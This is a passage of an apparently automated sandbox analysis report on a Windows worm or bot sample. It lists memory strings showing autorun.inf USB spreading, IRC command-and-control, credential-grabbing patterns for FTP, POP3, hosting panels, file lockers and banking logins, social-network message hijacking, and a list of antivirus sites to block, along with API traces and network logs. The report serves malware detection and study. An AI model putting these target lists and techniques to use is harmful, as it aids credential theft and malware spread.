pace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000028.00000002.621275200.00000000003F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000028.00000002.621275200.00000000003F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000029.00000002.620984806.0000000000280000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000029.00000002.620984806.0000000000280000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000029.00000002.620984806.0000000000280000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000029.00000002.620984806.0000000000280000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000029.00000002.620984806.0000000000280000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 0000002A.00000002.620410514.0000000000100000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000002A.00000002.620410514.0000000000100000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000002A.00000002.620410514.0000000000100000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 0000002A.00000002.620410514.0000000000100000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 0000002A.00000002.620410514.0000000000100000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 0_2_006045E0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_006045E0
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 2_2_006045E0 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,2_2_006045E0
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_0036F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,4_2_0036F130
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_0040F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,4_2_0040F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 9_2_003DF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,9_2_003DF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 10_2_0018F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,10_2_0018F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 11_2_0038F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,11_2_0038F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 12_2_0041F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,12_2_0041F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 13_2_001BF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,13_2_001BF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 14_2_0035F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,14_2_0035F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 15_2_0031F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,15_2_0031F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 16_2_0038F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,16_2_0038F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 17_2_0010F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,17_2_0010F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 18_2_0010F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,18_2_0010F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 19_2_0022F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,19_2_0022F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 20_2_0032F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,20_2_0032F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 21_2_0051F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,21_2_0051F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 22_2_0019F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,22_2_0019F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 23_2_0084F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,23_2_0084F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 25_2_0040F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,25_2_0040F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 26_2_0082F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,26_2_0082F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 27_2_0009F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,27_2_0009F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 29_2_005DF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,29_2_005DF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 30_2_0009F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,30_2_0009F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 31_2_0091F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,31_2_0091F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 32_2_0039F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,32_2_0039F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 33_2_0009F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,33_2_0009F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 34_2_0022F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,34_2_0022F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 35_2_0015F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,35_2_0015F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 36_2_007FF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,36_2_007FF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 37_2_0025F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,37_2_0025F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 38_2_0026F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,38_2_0026F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 39_2_003FF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,39_2_003FF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 40_2_003FF130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,40_2_003FF130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 41_2_0028F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,41_2_0028F130
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeCode function: 42_2_0010F130 memset,memset,lstrcpyA,SetCurrentDirectoryA,FindFirstFileA,CoInitialize,_snprintf,FindNextFileA,strncmp,strstr,_snprintf,FindNextFileA,FindClose,42_2_0010F130
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_0036F9E0 memset,GetLogicalDriveStringsA,lstrcatA,lstrcatA,4_2_0036F9E0
            Source: Joe Sandbox ViewIP Address: 151.101.2.137 151.101.2.137
            Source: Joe Sandbox ViewIP Address: 151.101.2.137 151.101.2.137
            Source: Joe Sandbox ViewIP Address: 18.244.18.38 18.244.18.38
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: C:\Users\user\Desktop\25F.tmp.exeCode function: 4_2_0036AA10 memset,lstrcpyA,InternetOpenA,lstrlenA,InternetOpenUrlA,HttpQueryInfoA,InternetQueryDataAvailable,InternetReadFile,??2@YAPAXI@Z,InternetReadFile,??2@YAPAXI@Z,??3@YAXPAX@Z,InternetCloseHandle,4_2_0036AA10
            Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\favicon[1].icoJump to behavior
            Source: global trafficHTTP traffic detected: GET /jquery-3.6.3.min.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: code.jquery.comDNT: 1Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /b?rn=1735632299605&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0B7EB9A71D6D654F0B8CACC11CC56471&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: sb.scorecardresearch.comDNT: 1Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /b2?rn=1735632299605&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0B7EB9A71D6D654F0B8CACC11CC56471&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: sb.scorecardresearch.comDNT: 1Connection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: www.msn.com
            Source: global trafficDNS traffic detected: DNS query: assets.msn.com
            Source: global trafficDNS traffic detected: DNS query: c.msn.com
            Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
            Source: global trafficDNS traffic detected: DNS query: code.jquery.com
            Source: global trafficDNS traffic detected: DNS query: browser.events.data.msn.com
            Source: QgGhoOpxHPl.exe, 0000002A.00000002.620410514.0000000000100000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://api.wipmania.com/
            Source: imagestore.dat.24.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: YJ1BHFNR.htm.24.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/common.802715d7a736bd82fc74.js
            Source: YJ1BHFNR.htm.24.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/experience.b374b0d5b40196862f17.js
            Source: YJ1BHFNR.htm.24.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/microsoft.b109cceab5e009228460.js
            Source: YJ1BHFNR.htm.24.drString found in binary or memory: https://assets.msn.com/bundles/v1/homePage/latest/midlevel/vendors.290823e0e7160e8e5303.js
            Source: {E68EA6F6-C74D-11EF-8F38-ECF4BBB5915B}.dat.6.dr, ~DF854EA4F5FD60E78B.TMP.6.drString found in binary or memory: https://www.msn.com/?ocid=iehp
            Source: imagestore.dat.24.drString found in binary or memory: https://www.msn.com/favicon.ico
            Source: experience.b374b0d5b40196862f17[1].js.24.drString found in binary or memory: https://www.msn.com/fr-ch/actualite/other/Mentions-l
            Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
